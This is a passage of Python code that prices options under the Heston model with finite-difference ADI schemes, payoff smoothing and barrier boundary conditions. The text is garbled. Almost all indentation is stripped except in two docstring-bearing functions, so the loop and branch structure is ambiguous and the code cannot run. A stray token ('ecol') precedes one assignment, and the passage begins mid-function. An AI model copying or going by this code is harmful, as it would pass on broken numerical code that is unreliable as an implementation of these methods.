lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
updatePayoffExplicit(F, Sc, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2+BC)*F #explicit
updatePayoffExplicit(Y0, Sc, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "LODLS":
a = 1 - math.sqrt(2)/2
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N):
F1 = lu.solve(F)
F1t = lu2.solve(F1)
F2 = lu.solve(F1t)
F2t = lu2.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F1t
#F = np.maximum(F,0)
elif method == "CN":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
Le = I-(1-a)*A
lu = sla.splu(Li)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M, L)
F1 = Le*F
updatePayoffBoundary(F1, Sc, B, iBarrier, M,L)
F = lu.solve(F1)
elif method =="LS":
a = 1 - math.sqrt(2)/2
if not B == 0:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
#F = np.maximum(F,0)
else:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
elif method == "O4":
A = A0+A1+A2
# a1 = 1.0/(6 - 2*math.sqrt(6))
# a2 = 1.0/(2*(3+math.sqrt(6)))
# lu1 = sla.splu(I + a1*A+BC)
# lu2 = sla.splu(I + a2*A+BC)
Asq = A*A
Li0 = I+A+0.5*Asq+1.0/6*A*Asq
lu0 = sla.splu(Li0+BC)
lu = sla.splu(I+0.5*A+1.0/12*Asq+BC)
#F0 = F - A*F + 0.5*A*A*F - 1.0/6* A*A*A*F
#F1 = F0 - A*F0 + 0.5*A*A*F0 - 1.0/6* A*A*A*F0# A*F0 + 0.5*A*(I-A/3)*(A*F0)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F0 = lu0.solve(F)
updatePayoffBoundary(F0, Sc, B,iBarrier,M,L)
F1 = lu0.solve(F0)
F = F1
for i in range(N-2):
Fr= F-0.5*A*(F - 1.0/6*A*F)
updatePayoffBoundary(Fr, Sc, B,iBarrier,M,L)
# F1 = lu2.solve(Fr)
# updatePayoffBoundary(F1, S, B,iBarrier,M,L)
F = lu.solve(Fr)
else:
if not B == 0:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
else:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
end=time.time()
#F[50+4*M]
#S0=101.52
Payoff = F.reshape(L,M)
#print("Payoff V=0",Payoff[0])
jv0 = np.searchsorted(V,v0)
#print("Payoff V=V0",V[jv0])
#for (si,pi) in zip(S, Payoff[jv0]):
# print(si, pi)
#
# # istrike =np.searchsorted(S,K)
# # print("Payoff S=K",S[istrike])
# # for (vi,pi) in zip(V, Payoff[:][istrike]):
# # print(vi, pi)
# plt.grid(True)
# plt.plot(S[:30], Payoff[jv0][:30])
# #plt.plot(V,Payoff[:][istrike])
# plt.yscale('symlog',linthreshy=1e-6)
# plt.show()
#Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
Payoffi = interpolate.RectBivariateSpline(V,S,Payoff,kx=3,ky=3,s=0)
maxError = 0.0
# Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
#print("spot method n m l price delta gamma error")
for spot,refPrice in zip(spotArray,priceArray):
price = Payoffi(v0,spot)[0][0]
delta = Payoffi(v0,spot,dy=1)[0][0]
gamma = Payoffi(v0,spot,dy=2)[0][0]
error = price -refPrice
if abs(error) > maxError:
maxError = abs(error)
# print(spot,method,N,M,L, price, delta,gamma,error)
if not B==0:
print(method,N,M,L,Payoffi(v0,K)[0][0],end-start)
else:
print(method,N,M,L,maxError,end-start)
def updateSystemBoundary(L,M,iBarrier,Sc,B,A0,A1,A2,BC):
    """Deactivate the PDE operator below the barrier and install the barrier BC.

    For every spot index i strictly below the barrier index iBarrier (i=0 is
    left alone: it carries the lower spot boundary condition), the rows of the
    correlation operator A0, the spot operator A1 and the variance operator A2
    are zeroed, so those nodes are governed solely by the boundary matrix BC.
    Finally delegates to updateBoundaryCondition to write the interpolated
    knock-out condition into BC. All matrices are mutated in place.

    L, M        -- number of variance / spot grid nodes
    iBarrier    -- first spot index at or above the barrier (Sc[i-1] < B <= Sc[i])
    Sc          -- mapped spot grid values
    B           -- barrier level
    A0,A1,A2,BC -- lil_matrix operators of shape (L*M, L*M)

    Fix vs. original: the centre A0 entry was cleared twice in a row
    (duplicated statement); the redundant second assignment is removed.
    """
    for i in range(1,iBarrier):
        # One-sided variance stencils at the j=0 and j=L-1 edges.
        j=0
        A2[i+j*M,i+(j+1)*M] = 0
        A2[i+j*M,i+j*M] = 0
        j=L-1
        A2[i+j*M,i+(j-1)*M] = 0
        A2[i+j*M,i+j*M] = 0
        # Interior variance nodes: clear the 3-point A2 stencil and the
        # 4-corner + centre cross-derivative (A0) stencil.
        for j in range(1,L-1):
            A2[i+j*M,i+(j+1)*M] = 0
            A2[i+j*M,i+j*M] = 0
            A2[i+j*M,i+(j-1)*M] = 0
            A0[i+j*M,i+1+(j+1)*M] = 0
            A0[i+j*M,i+1+(j-1)*M] = 0
            A0[i+j*M,i-1+(j+1)*M] = 0
            A0[i+j*M,i-1+(j-1)*M] = 0
            A0[i+j*M,i+(j)*M] = 0
        # Spot-direction 3-point stencil, every variance level including edges.
        for j in range(0,L):
            A1[i+j*M,(i+1)+j*M] = 0
            A1[i+j*M,i+j*M] = 0
            A1[i+j*M,(i-1)+j*M] = 0
    updateBoundaryCondition(L,M,iBarrier,Sc,B,BC)
def updateBoundaryCondition(L,M,iBarrier, Sc, B, BC):
    """Write the linear-interpolation barrier condition into BC, in place.

    For each variance level, the row of the spot node just below the barrier
    (index iBarrier-1) is filled so that the value linearly interpolated
    between Sc[iBarrier-1] and Sc[iBarrier] vanishes exactly at the barrier
    level B (knock-out condition).
    """
    gap = Sc[iBarrier] - Sc[iBarrier-1]
    below = (Sc[iBarrier] - B)/gap - 1
    above = (B - Sc[iBarrier-1])/gap
    for level in range(L):
        row = iBarrier - 1 + level*M
        BC[row, row] = below
        BC[row, row + 1] = above
def priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L):
isCall = False #True
method = "LS" # "LS","CN","DO"
smoothing = "KreissF" #"Kreiss","Averaging","None"
useDamping = False
useLinear = False
useVLinear = False #False
useExponentialFitting = True
upwindingThreshold = 1.0
epsilon = 1e-3
dChi = 4*kappa*theta/(sigma*sigma)
chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
#print("vmax",vmin,vmax, 10*v0)
vmin = max(1e-4,vmin)
V = np.arange(L)*(vmax/(L-1))
W = V
hl = W[1]-W[0]
JV=np.ones(L)
JVm=np.ones(L)
if not useVLinear:
vscale = v0*2
u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
c1 = math.asinh((vmin-v0)/vscale)
c2 = math.asinh((vmax-v0)/vscale)
V = v0 + vscale*np.sinh((c2-c1)*u+c1)
hl = u[1]-u[0]
JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
Xspan = 4*math.sqrt(theta*T)
logK = math.log(K) #f(e^zi) = K
Kinv = cFunc.solve(K)
logKinv = math.log(Kinv)
ecol Xmin = logK - Xspan + (r-q)*T - 0.5*v0*T
Xmax = logK + Xspan + (r-q)*T - 0.5*v0*T
# Xmin = math.log(cFunc.solve(math.exp(Xmin)))
# Xmax = math.log(cFunc.solve(math.exp(Xmax)))
# print(Xmin,Xmax,logKinv)
X = np.linspace(Xmin,Xmax,M)
hm = X[1]-X[0]
S = np.exp(X)
J=np.ones(M)
Jm=np.ones(M)
#S lin
if useLinear:
#S=np.linspace(0,K*4,M)
#X-=hm/2
S=np.exp(X)
J=np.ones(M)
Jm=np.ones(M)
#V
cFuncEval = np.vectorize(cFunc.evaluate)
Sc = np.array([cFunc.evaluate(T,Si) for Si in S])
# plt.grid(True)
# # plt.plot(S,Sc)
# plt.plot(S, [(cFunc.evaluate(Si+1e-5)-cFunc.evaluate(Si))/1e-5 for Si in S])
# plt.show()
if isCall:
F0 = np.maximum(Sc-K,0)
else:
F0 = np.maximum(K-Sc,0)
F0smooth = np.array(F0,copy=True)
dIndices = set()
alldisc = cFunc.X + [Kinv]
for xd in (alldisc):
logxd = math.log(xd)
ixd = np.searchsorted(X,logxd) # S[i-1]<K<=S[i]
dIndices.add(ixd)
if ixd > 0:
dIndices.add(ixd-1)
#indices = range(M)
#print(K, Kinv, cFunc.evaluate(Kinv)-K)
#raise Error
if smoothing == "Averaging":
iStrike = np.searchsorted(X,logKinv) # S[i-1]<K<=S[i]
if logKinv < (X[iStrike]+X[iStrike-1])/2:
iStrike -= 1
payoff1 = lambda v: cFunc.evaluate(T,math.exp(v))-K
payoff1 = np.vectorize(payoff1)
value = 0
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
value = integrate.quad( payoff1, logKinv, a)
else:
a = (X[iStrike]+X[iStrike-1])/2 # int a,lnK K-eX dX = K(a-lnK)+ea-K
value = integrate.quad( payoff1, logKinv, a)
h = (X[iStrike+1]-X[iStrike-1])/2
F0smooth[iStrike] = value[0]/h
elif smoothing == "Kreiss":
iStrike = np.searchsorted(X,logKinv) # S[i-1]<K<=S[i]
xmk = X[iStrike]
h = (X[iStrike+1]-X[iStrike-1])/2
payoff1 = lambda v: (cFunc.evaluate(T,math.exp(xmk-v))-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
#logKinv>0
value1 = integrate.quad( payoff1, 0,xmk-logKinv)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
F0smooth[iStrike] = value
iStrike -= 1
xmk = X[iStrike]
payoff1 = lambda v: (cFunc.evaluate(T,math.exp(xmk-v))-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
#logKinv<0
value1 = integrate.quad( payoff1, -h,xmk-logKinv)
value = (value1[0]) /h
F0smooth[iStrike] = value
elif smoothing=="KreissF":
for i in (dIndices):
xmk = X[i]
h = hm #(X[i+1]-X[i-1])/2
sign = 1
if not isCall:
sign=-1
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,math.exp(xmk-v))-K),0)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,h)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
elif smoothing=="KreissF4":
for i in range(M):
xmk = X[i]
h = hm #(X[i+1]-X[i-1])/2
sign = 1
if not isCall:
sign=-1
# f4 = @(x) (1/36)*(1/2)*...
# ( +56*x.^3.*sign(x) +(x-3).^3.*(-sign(x-3)) +12*(x-2).^3.*sign(x-2) -39*(x-1).^3.*sign(x-1) -39*(x+1).^3.*sign(x+1) +12*(x+2).^3.*sign(x+2) -(x+3).^3.*sign(x+3));
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,math.exp(xmk-v))-K),0)*1.0/72*(56*pow(abs(v/h),3) -pow(abs(v/h-3),3) +12*pow(abs(v/h-2),3) -39*pow(abs(v/h-1),3) -39*pow(abs(v/h+1),3) +12*pow(abs(v/h+2),3) -pow(abs(v/h+3),3))
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, -3*h,3*h)
# value0 = integrate.quad( payoff1, -3*h, 0)
value = (value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
#print("F0smooth",F0smooth)
iBarrier = 1
if not B == 0:
iBarrier = np.searchsorted(S,B) #S[i-1]<B<=S[i]
F = []
for j in range(L):
F = np.append(F,F0smooth)
dt = -T/N
A01 = lil_matrix((L*M,L*M))
A02 = lil_matrix((L*M,L*M))
A1 = lil_matrix((L*M,L*M))
A2 = lil_matrix((L*M,L*M))
BC = lil_matrix((L*M,L*M))
#boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
i=0
j=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=0
j=L-1
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += rij
#A[i+j*M,i+1+(j-1)*M]+=-rij
#A[i+j*M,i+1+(j)*M]+=rij
#A[i+j*M,i+(j-1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
i=M-1
j=L-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
i=M-1
j=0
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j+1)*M]+=-rij
#A[i+j*M,i-1+(j)*M]+=rij
#A[i+j*M,i+(j+1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
#boundary conditions j=0,L-1.
for i in range(1,M-1):
j=0
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q-0.5*V[j])
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
j=L-1
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q-0.5*V[j])
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
rij = dt*rho*sigma*V[j]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
for j in range(1,L-1):
#boundary conditions i=0,M-1.
i=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A0[i+j*M,i+1+(j+1)*M]+=rij
#A0[i+j*M,i+1+(j)*M]+=-rij
#A0[i+j*M,i+(j+1)*M]+=-rij
#A0[i+j*M,i+(j)*M]+=rij
i=M-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=+rij
for i in range(1,M-1):
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
svj = sigma*sigma*V[j]/(JV[j])
drifti = (r-q-0.5*V[j])
driftj = kappa*(theta-V[j])
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi +0.5*abs(drifti)*hm
if driftj != 0 and abs(driftj*hl/svj) > 1.0:
# svj = svj +0.5*abs(driftj)*hl
svj = driftj*hl/math.tanh(driftj*hl/svj)
rij = dt*0.25*rho*sigma*V[j]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i+1])+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*0.5/(hm*hm)*(1.0/Jm[i+1]+1.0/Jm[i]) -r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i])-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(hl*hl*JVm[j+1])+driftj/(2*JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5-svj*0.5/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
A2[i+j*M,i+(j-1)*M] += dt*(svj*0.5/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
A01[i+j*M,i+1+(j+1)*M]+= rij
A02[i+j*M,i+1+(j-1)*M]+=-rij
A02[i+j*M,i-1+(j+1)*M]+=-rij
A01[i+j*M,i-1+(j-1)*M]+=rij
A01[i+j*M,i+(j)*M]+=-2*rij
A02[i+j*M,i+(j)*M]+=2*rij
A0 = (A01+A02).tolil()
A0Full=A0.copy()
A1Full=A1.copy()
A2Full=A2.copy()
A1tri, A2tri, indices, indicesInv = createTridiagonalIndices(M,L)
A1tri[1,:] = A1.diagonal(k=0)
A1tri[-1,:-1] = A1.diagonal(k=-1)
A1tri[0,1:] = A1.diagonal(k=1)
A2tri[1,:] = A2.diagonal(k=0)[indicesInv]
A2i = A2[:,indicesInv]
A2i = A2i[indicesInv,:]
#print("size",A2i.shape)
A2tri[-1,:-1] = A2i.diagonal(k=-1)
A2tri[0,1:] = A2i.diagonal(k=1)
#print((A0+A1+A2).shape)
# print((A0+A1+A2)[:,1000].getnnz())
#plt.spy(A0+A1+A2,markersize=1)
#plt.show()
#raise Error
I = identity(M*L,format="csc")
start=time.time()
if useDamping:
A = A0+A1+A2
a = 0.5
Li = I+a*A + BC
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
N -= 1
if method == "CS":
a = 0.5
if B == 0:
craigSneydBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv)
else:
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0r = Y0+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1r)
Y0t = Y0 - 0.5*(A0*Y2-A0*F)
Y0r = Y0t+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1t = lu1.solve(Y0r)
Y1r = Y1t+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2t = lu2.solve(Y1r)
F = Y2t
elif method == "HV":
a = 0.5+math.sqrt(3)/6
if B == 0:
F = hundsdorferVerwerBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv)
else:
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
#updatePayoffExplicit(Y2, S, B, iBarrier, M,L)
Y0 = F-0.5*(A0+A1+A2)*(F+Y2)
Y0 = Y0+a*A1*Y2
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*Y2
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "DO":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
updatePayoffExplicit(F, Sc, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2+BC)*F #explicit
updatePayoffExplicit(Y0, Sc, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "LODLS":
a = 1 - math.sqrt(2)/2
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N):
F1 = lu.solve(F)
F1t = lu2.solve(F1)
F2 = lu.solve(F1t)
F2t = lu2.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F1t
#F = np.maximum(F,0)
elif method == "CN":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
Le = I-(1-a)*A
lu = sla.splu(Li)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M, L)
F1 = Le*F
updatePayoffBoundary(F1, Sc, B, iBarrier, M,L)
F = lu.solve(F1)
elif method =="LS":
a = 1 - math.sqrt(2)/2
if B==0:
A = A0+A1+A2
Li = I+a*A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
#F = np.maximum(F,0)
else:
for i in range(N):
ti = T*(N-i)/N
ti += a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
ti += a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
elif method == "O4":
A = A0+A1+A2
# a1 = 1.0/(6 - 2*math.sqrt(6))
# a2 = 1.0/(2*(3+math.sqrt(6)))
# lu1 = sla.splu(I + a1*A+BC)
# lu2 = sla.splu(I + a2*A+BC)
Asq = A*A
Li0 = I+A+0.5*Asq+1.0/6*A*Asq
lu0 = sla.splu(Li0+BC)
lu = sla.splu(I+0.5*A+1.0/12*Asq+BC)
#F0 = F - A*F + 0.5*A*A*F - 1.0/6* A*A*A*F
